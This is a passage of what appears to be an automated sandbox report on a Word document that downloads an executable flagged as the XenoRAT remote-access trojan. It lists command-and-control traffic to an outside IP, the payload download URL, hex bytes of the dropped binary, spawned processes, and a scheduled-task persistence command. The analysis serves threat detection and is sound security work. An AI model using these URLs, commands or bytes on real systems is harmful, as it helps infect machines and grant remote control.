Dec 6, 2024 10:31:09.000459909 CET	2222	49186	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:09.000680923 CET	49186	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:11.135256052 CET	2222	49186	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:11.135494947 CET	49186	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:11.235912085 CET	49187	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:11.356010914 CET	2222	49187	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:11.356200933 CET	49187	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:13.479176044 CET	2222	49187	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:13.479338884 CET	49187	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:13.575854063 CET	49188	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:13.695636034 CET	2222	49188	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:13.695779085 CET	49188	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:15.843219042 CET	2222	49188	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:15.843339920 CET	49188	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:15.947093964 CET	49189	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:16.066953897 CET	2222	49189	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:16.067073107 CET	49189	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:18.216980934 CET	2222	49189	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:18.217086077 CET	49189	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:18.333887100 CET	49190	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:18.453886986 CET	2222	49190	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:18.454000950 CET	49190	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:20.607685089 CET	2222	49190	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:20.607863903 CET	49190	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:20.705029964 CET	49191	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:20.825016022 CET	2222	49191	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:20.825119019 CET	49191	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:22.967046022 CET	2222	49191	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:22.967102051 CET	49191	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:23.091790915 CET	49192	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:23.212181091 CET	2222	49192	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:23.212277889 CET	49192	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:25.358503103 CET	2222	49192	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:25.358577967 CET	49192	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:25.463061094 CET	49193	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:25.583136082 CET	2222	49193	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:25.583264112 CET	49193	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:27.793695927 CET	2222	49193	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:27.793808937 CET	49193	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:27.924200058 CET	49194	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:28.044593096 CET	2222	49194	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:28.044737101 CET	49194	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:30.236284971 CET	2222	49194	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:30.236428976 CET	49194	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:30.361696005 CET	49195	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:30.481657982 CET	2222	49195	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:30.485517025 CET	49195	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:32.675945044 CET	2222	49195	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:32.676043034 CET	49195	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:32.779937029 CET	49196	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:32.899988890 CET	2222	49196	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:32.900196075 CET	49196	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:35.182631969 CET	2222	49196	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:35.182854891 CET	49196	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:35.291296005 CET	49197	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:35.411422968 CET	2222	49197	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:35.411505938 CET	49197	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:37.562814951 CET	2222	49197	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:37.562958956 CET	49197	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:37.678250074 CET	49198	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:37.798269987 CET	2222	49198	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:37.798357964 CET	49198	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:39.936031103 CET	2222	49198	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:39.936108112 CET	49198	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:40.033996105 CET	49199	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:40.153908968 CET	2222	49199	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:40.154066086 CET	49199	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:42.276604891 CET	2222	49199	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:42.276753902 CET	49199	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:42.389735937 CET	49200	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:42.509955883 CET	2222	49200	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:42.510088921 CET	49200	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:44.636133909 CET	2222	49200	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:44.636418104 CET	49200	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:44.745377064 CET	49201	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:44.865577936 CET	2222	49201	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:44.865715027 CET	49201	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:47.014645100 CET	2222	49201	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:47.014772892 CET	49201	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:47.116091013 CET	49202	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:47.235888958 CET	2222	49202	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:47.235995054 CET	49202	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:50.265067101 CET	2222	49202	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:50.265178919 CET	49202	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:50.361316919 CET	49203	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:50.482228041 CET	2222	49203	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:50.482315063 CET	49203	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:52.624449015 CET	2222	49203	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:52.624599934 CET	49203	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:52.732223034 CET	49204	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:52.852113962 CET	2222	49204	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:52.852224112 CET	49204	2222	192.168.2.22	87.120.120.27

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 10:29:47.731921911 CET	54562	53	192.168.2.22	8.8.8.8
Dec 6, 2024 10:29:48.102530956 CET	53	54562	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 10:29:47.731921911 CET	192.168.2.22	8.8.8.8	0xf38d	Standard query (0)	www.stipamana.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 10:29:48.102530956 CET	8.8.8.8	192.168.2.22	0xf38d	No error (0)	www.stipamana.com		87.121.86.205	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.stipamana.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	87.121.86.205	443	3556	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-12-06 09:29:49 UTC	422	OUT	GET /sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.stipamana.com Connection: Keep-Alive
2024-12-06 09:29:50 UTC	320	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 06 Dec 2024 09:29:50 GMT Content-Type: application/octet-stream Content-Length: 169984 Last-Modified: Fri, 06 Dec 2024 06:41:07 GMT Connection: close ETag: "67529c83-29800" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Accept-Ranges: bytes
2024-12-06 09:29:50 UTC	16064	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 83 9c 52 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 80 02 00 00 16 00 00 00 00 00 00 ae 9e 02 00 00 20 00 00 00 a0 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELRg @ `
2024-12-06 09:29:50 UTC	16384	IN	Data Raw: 90 16 c9 b5 ec 33 5f 65 51 0b 52 6e 8a 3b fb d5 c2 51 62 34 54 b8 8c d9 19 8b 10 97 e0 7e bd 7e 1b 30 60 d2 38 5a 9a f7 7d 2d a6 aa 1e 01 c4 c7 c3 f6 85 95 0d 3f 9b 57 21 d4 d7 bd b1 a7 fe fe b4 30 77 65 11 5d 5c 3e bb 8c 0c 4b 52 15 ef a4 e9 4d fc 48 be ac dd 49 6a 90 a2 da c5 6e ea 63 f6 c8 36 8b e9 4d 3c 06 50 91 d8 12 1c 09 2e 44 96 6d de 8a 8c 72 7f 9a 21 4a 92 58 fc 31 06 f2 66 00 40 0a 39 e3 a7 80 e9 6c f5 76 1a a0 8f 7c f2 8a e2 5d cc 9c 9f aa 40 cc a8 c3 ce b6 14 90 9d 1a 61 22 38 52 4a fa 92 96 81 69 c6 39 28 82 6d ca f9 8e 40 d6 84 fd c4 6b 5c 1b d4 a8 00 63 e0 4c 2f df 1c f8 c0 6b be 7b 80 0d 53 44 da 8e 46 41 c2 0a 4d fe b5 fd d1 8d e2 b5 e0 9b 2a 7e 8e c7 60 85 21 44 ce a9 a7 95 19 fe b8 d2 87 b1 6d fd 7d 06 1c 9a de 2a 24 61 4b f4 68 41 97 Data Ascii: 3_eQRn;Qb4T~~0`8Z}-?W!0we]\>KRMHIjnc6M<P.Dmr!JX1f@9lv\|]@a"8RJi9(m@k\cL/k{SDFAM~`!Dm}$aKhA
2024-12-06 09:29:50 UTC	16384	IN	Data Raw: 8a 3e 10 db 22 ec ed 05 77 83 58 50 9e 1b eb 65 a2 89 22 b5 7e a2 28 e9 07 21 e7 38 1f 7b ee a1 48 c5 d3 4b 18 80 8b a8 b8 9c 76 e7 54 02 15 bc 6a e4 20 48 90 23 c3 c0 f7 93 9f ef e1 b0 b1 53 9a e5 39 ee 93 7d 81 4e 7c 14 f6 1d a6 7a 08 78 bd c6 4a 12 84 6d 69 d3 4e d6 1e ae 16 fe f0 74 0a 68 ea 4f 1b c3 a8 1d 81 8c 61 ab 58 0b 61 b1 92 bb 6c 61 c8 8a 2c 99 fe ac f3 f4 c4 35 e1 90 df e7 cb 1d c0 88 a6 74 39 a3 a2 56 33 27 bb 8a b1 b6 c4 d5 15 3e ad cb cc 70 3e 80 d2 f6 bd 8e a4 68 3b 38 49 a0 55 fe b2 b5 69 28 b0 07 e8 2c 69 1e 70 f5 c3 f3 1a bd 3f 07 1e 90 34 98 bc f1 b5 70 23 ea 0a c8 7d 87 13 09 ae b3 ae 27 0f 6c 96 8a c1 02 5b fd 2b 9f 7b 4c 81 d2 84 4b 59 0b 2f ed c7 b8 5f 5e b6 56 4d 64 05 6b 79 bd e1 18 25 4c 9d ff 2e 0e 0d 68 30 07 39 a6 68 20 9a Data Ascii: >"wXPe"~(!8{HKvTj H#S9}N\|zxJmiNthOaXala,5t9V3'>p>h;8IUi(,ip?4p#}'l[+{LKY/_^VMdky%L.h09h
2024-12-06 09:29:50 UTC	16384	IN	Data Raw: 6c ca d7 48 60 f7 2b 81 23 2e d4 3e 37 c5 68 36 d8 ae d3 c7 b8 24 1d 17 78 02 23 ca b8 17 2f 49 89 8b a8 7e 18 0e 26 32 12 47 9b 1c 02 cd bf 27 e4 0b 10 8f c6 ec a0 29 61 d9 71 77 7e a1 ea 10 6b 20 60 10 a8 93 99 8d ea 92 b5 99 26 e4 04 f1 94 72 63 b7 45 5f b8 f2 1d be 80 3a bf 26 78 f7 b8 b2 f3 82 32 63 79 c1 cf 65 27 18 cb a0 16 39 51 96 52 5d 94 94 84 d5 21 d3 0d 1b 5b 1a 0b 8f de d6 c9 72 28 ec 7c 7e c4 43 3d 52 6f b1 3c a6 85 e8 6a a6 d4 b8 51 71 95 a8 51 57 fa 75 12 2e fb 27 fe a7 05 6c ea 89 2b 14 19 0f f5 81 f6 41 3d aa d4 b5 ec 74 5f f1 54 bc 62 a3 ee 05 e0 31 7b 89 17 bc f8 d3 f1 df c8 7f 6a 19 14 6c 55 03 8c 47 42 27 bd 8f ae 17 5f b6 b3 87 75 65 bc 1f 6b 53 d9 60 cc 11 82 57 bd 92 8b 3b 5a e5 bd bf 59 5e 29 fd ee 63 22 53 33 55 fb bc 4a 15 69 Data Ascii: lH`+#.>7h6$x#/I~&2G')aqw~k `&rcE_:&x2cye'9QR]![r(\|~C=Ro<jQqQWu.'l+A=t_Tb1{jlUGB'_uekS`W;ZY^)c"S3UJi
2024-12-06 09:29:50 UTC	16384	IN	Data Raw: 0d ee 66 58 aa d4 1b 3f 56 b2 bc 65 a5 f6 a5 22 d6 dd cb 30 d0 47 6e 79 1d f4 cf 31 ca 3c c9 6c b9 bf 29 f4 ec e2 c6 70 2f 29 49 02 51 51 aa 43 9a 58 0d 08 72 c0 69 99 a7 85 12 cb ba 21 fb 8e 57 1e 3e 34 bf 2c b7 f2 78 fa e6 31 ce 5a 82 f6 db 5d 43 f3 40 ec 0a 90 29 00 0c 1d 15 de ba ba 87 a7 62 2e 76 54 2b 37 82 09 0b ea 0e ed 30 90 f3 f6 37 d7 66 0a 60 b5 03 8a a8 4b d7 49 58 29 e5 ea 85 e1 70 f6 ed 9c f7 a4 86 a2 fe 4f 2c ca 76 ed 11 e0 56 26 45 60 df cc 10 fa 49 83 c7 36 ce 33 aa 00 b5 c8 03 78 d2 6e cb d9 23 46 e4 1d 11 d5 05 c3 c5 7b f0 48 c8 96 31 62 ee 88 7d 6b e0 8a 3e ba 1a 35 2d 06 f1 c4 75 da b7 92 9a 8f 38 bb 28 f7 8d 18 44 24 22 49 9d e4 42 44 dc 72 2b 04 f1 31 35 e7 e1 58 78 91 30 60 d6 37 fd cc ed a0 4f b0 69 0a 6f 6f 38 f5 43 bf 01 81 8a Data Ascii: fX?Ve"0Gny1<l)p/)IQQCXri!W>4,x1Z]C@)b.vT+707f`KIX)pO,vV&E`I63xn#F{H1b}k>5-u8(D$"IBDr+15Xx0`7Oioo8C
2024-12-06 09:29:50 UTC	16384	IN	Data Raw: ef a4 57 f8 f2 05 eb 26 a2 d8 b1 13 be 0a 17 8d 39 6d d8 af 8c 65 06 54 c4 81 84 f1 ac 45 62 ec 5a 1e c7 35 d4 e1 f5 b0 b5 21 f8 d9 5a 8d 99 88 2d 92 a6 31 bd 31 20 de b4 ed a1 48 9a 4e 61 46 f0 43 de cf 44 19 e0 42 73 97 3d 4a aa 03 c7 62 0a 68 d8 dd cc 8a d7 64 a4 bc a7 00 d5 d2 8e 8f ee 99 4b ae df c1 7c bb 64 c4 16 39 30 14 f1 8a 0d e9 55 6e 46 b5 4e b7 45 b8 7c fb b7 5a 6f 30 20 64 1b 65 ad ba 92 29 f2 89 69 15 76 67 ca 9a 77 d4 db 96 2a cc eb d4 d7 a5 81 d9 c8 7f 8f 15 ca 33 6e a9 95 b1 e3 56 93 e6 ae 97 5c b9 33 fe d9 7b 71 63 66 08 2e a9 5e 31 d3 ef f3 df 5c e6 c2 f8 a3 d6 d6 ce 77 6e ca b9 18 1c f5 a4 0e 58 73 51 c9 17 30 22 23 d9 cd 18 09 4e cc c5 04 ec 52 3d b8 1e e3 66 55 ad 5f 9c 9e 3e e0 7e 7c 95 57 f0 ac 3a 63 2a 7a f4 75 73 4c 14 3f 82 33 Data Ascii: W&9meTEbZ5!Z-11 HNaFCDBs=JbhdK\|d90UnFNE\|Zo0 de)ivgw3nV\3{qcf.^1\wnXsQ0"#NR=fU_>~\|W:czusL?3
2024-12-06 09:29:50 UTC	16384	IN	Data Raw: 5a 2e f9 3a ea 8e 7d 93 e2 bc 71 78 77 6f e0 5d 90 96 97 eb 7c bf 41 fc d0 a8 75 e4 d5 ee 5c fd 6f 3d 54 79 06 80 27 d7 9c 07 b3 25 03 a0 2c 33 40 57 33 aa 2f 00 c3 b4 c3 83 c1 0d 7a 68 0b ba 84 ba 36 5e 00 e5 91 b5 cf bb fa 80 9b 20 4c 6e e7 eb ab eb 02 98 d4 6d 9c b0 7e bc a9 52 b7 65 b1 59 cf 9c d0 87 00 6c d7 cd f9 91 32 4f 2b a8 81 db d6 d0 92 dd 4f 40 f9 52 fd e1 28 e4 23 68 e5 7b 3f df 60 50 34 36 45 87 e5 63 05 f5 6d 12 8c 2f 1d 3b 1d d4 a9 04 81 96 e7 e8 c4 1d c9 db 2f f0 1d b1 83 90 6a 75 eb de 17 0a f9 b8 aa b0 b0 e8 11 52 1d be af d1 c6 ca 47 da 44 7f 3d f2 90 6c c0 02 53 91 2b d9 1f f8 30 7d 95 2c b5 26 87 7d 2b c0 b3 38 1a fa ff 0c e5 2b 10 2a be b2 ff dd b7 9e 92 7d 54 18 91 7b 82 7a 74 41 73 70 45 1f b1 73 f4 9f 6b 0d 72 6a 9f e7 67 f5 26 Data Ascii: Z.:}qxwo]\|Au\o=Ty'%,3@W3/zh6^ Lnm~ReYl2O+O@R(#h{?`P46Ecm/;/juRGD=lS+0},&}+8+*}T{ztAspEskrjg&
2024-12-06 09:29:50 UTC	16384	IN	Data Raw: 66 96 29 a8 88 77 da e8 ec 7b 33 a1 21 44 f6 bf 25 08 8a ab d3 7d b0 af 65 d3 0b 24 e5 83 84 df 31 50 d7 b9 8c de 01 73 47 6e 9c 8f 41 e5 89 63 5f 76 2d 54 1f 9e 48 2b f8 fb 48 32 18 ba b2 d0 60 82 2c 1c 07 a0 a5 4f d8 2b 0e a7 1a 75 0e 72 52 c9 d7 46 28 f6 cc ee 77 33 86 44 64 09 19 fb c6 bc eb 0d c2 c0 bb 8d ee 62 d5 af bb 22 1d 39 23 eb 2c 8f 94 8b 18 bf a5 12 3e f3 66 9d e5 de 57 89 2f c5 82 35 40 f0 f0 8b 9e a5 a8 5c e7 4a 03 f7 89 ef 69 4a 43 23 20 36 48 ff 5e 90 7e 23 90 fa ba 89 9c bd 3c a1 2a 2e 4f c4 ae 18 2a 9f ff 44 7a 75 cc de 72 bd e3 9b 2b c4 6c e6 b0 85 c1 da b7 fc 6a 2b 11 da 3e e2 3b df 2e 9c a7 fe e3 79 14 e5 67 a1 09 84 68 3a 4f e8 dd 78 6f ea f8 e6 f6 77 9a 19 eb 78 7a f1 6e 89 5a 1b c9 75 be e8 00 8e 25 8b c3 1f c3 e9 51 fd 35 84 b2 Data Ascii: f)w{3!D%}e$1PsGnAc_v-TH+H2`,O+urRF(w3Ddb"9#,>fW/5@\JiJC# 6H^~#<.ODzur+lj+>;.ygh:OxowxznZu%Q5
2024-12-06 09:29:50 UTC	16384	IN	Data Raw: 49 18 c0 b7 51 7b ae e9 b2 5e c0 a9 d7 8d 7d 7a 3f 58 d2 f4 b3 7b 1f 75 f6 af d2 dc 8b 1a 6c a2 be 2d bb af a6 e6 e5 db 4c bf b3 02 6b 26 39 4f 29 32 8b e8 30 f7 79 54 18 0b 0d 54 4c 31 a4 bd 89 7b 8e ab 66 fb 3d ad 2b 76 03 f5 14 1b 0c 3f dd 6d c4 3b e5 ba ef 5c 6e 15 9a 00 07 b2 3e ab 62 66 51 4f 57 74 54 2b c5 61 a9 27 2d 6b d4 5d eb b7 39 81 53 b9 ca 64 e1 1b 88 99 e1 84 b3 b5 be 1d fe 7b 84 63 68 59 35 1c fa 4e 51 14 ba 22 8f 4e a8 9a a7 47 b8 92 3e 01 76 1a 53 18 32 32 d9 fb 4d 3f 78 1c 60 62 fd 39 44 96 e2 83 64 75 38 89 f6 92 e8 3b 94 d9 74 87 be f8 b0 27 b0 61 ca 70 fa 56 78 3a 1c dd 06 f6 3e 5c a5 fd 33 24 6f 70 6d 61 08 33 ca b9 7f eb bd b9 2a 94 aa bb fe b7 ae b1 cb cf 1c c5 8a b2 0d aa 2b 8e 8b 02 2d 94 87 d1 c9 0f 20 47 1d 07 9f 9b cd 27 34 Data Ascii: IQ{^}z?X{ul-Lk&9O)20yTTL1{f=+v?m;\n>bfQOWtT+a'-k]9Sd{chY5NQ"NG>vS22M?x`b9Ddu8;t'apVx:>\3$opma3*+- G'4
2024-12-06 09:29:50 UTC	16384	IN	Data Raw: 42 6c 6f 63 6b 00 50 75 74 42 79 74 65 00 47 65 74 42 79 74 65 00 53 74 61 74 65 00 49 6e 64 65 78 00 55 70 64 61 74 65 43 68 61 72 00 55 70 64 61 74 65 4d 61 74 63 68 00 55 70 64 61 74 65 52 65 70 00 55 70 64 61 74 65 53 68 6f 72 74 52 65 70 00 49 73 43 68 61 72 53 74 61 74 65 00 e2 81 aa e2 80 8e e2 81 ae e2 80 aa e2 81 af e2 81 ac e2 81 ae e2 80 8e e2 81 ab e2 81 aa e2 80 8c e2 80 8c e2 80 ab e2 80 8c e2 80 8d e2 80 ac e2 80 8b e2 81 ae e2 80 8f e2 80 ae e2 80 8b e2 81 af e2 80 8b e2 80 8f e2 81 ac e2 80 8c e2 80 8d e2 80 ac e2 80 aa e2 81 ae e2 81 ad e2 80 8f e2 80 ae e2 81 ad e2 80 8e e2 81 ac e2 81 aa e2 80 8f e2 80 ad e2 80 ae e2 80 ae 00 e2 81 ab e2 80 ab e2 81 ae e2 80 8b e2 80 8f e2 80 8e e2 81 ad e2 80 ab e2 80 ad e2 81 ab e2 81 ab e2 80 ac e2 Data Ascii: BlockPutByteGetByteStateIndexUpdateCharUpdateMatchUpdateRepUpdateShortRepIsCharState

Target ID:	0
Start time:	04:29:43
Start date:	06/12/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fb70000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:29:50
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe"
Imagebase:	0xbe0000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000004.00000002.375878692.0000000002011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000004.00000002.375878692.00000000020F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:29:51
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Imagebase:	0xbe0000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000005.00000002.375386923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:29:51
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Imagebase:	0xbe0000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	04:29:51
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Imagebase:	0xbe0000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:29:52
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe"
Imagebase:	0xb10000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000008.00000002.380210454.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000008.00000002.380210454.0000000002500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000008.00000002.380210454.0000000002411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:29:52
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
Imagebase:	0xb10000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:29:52
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F
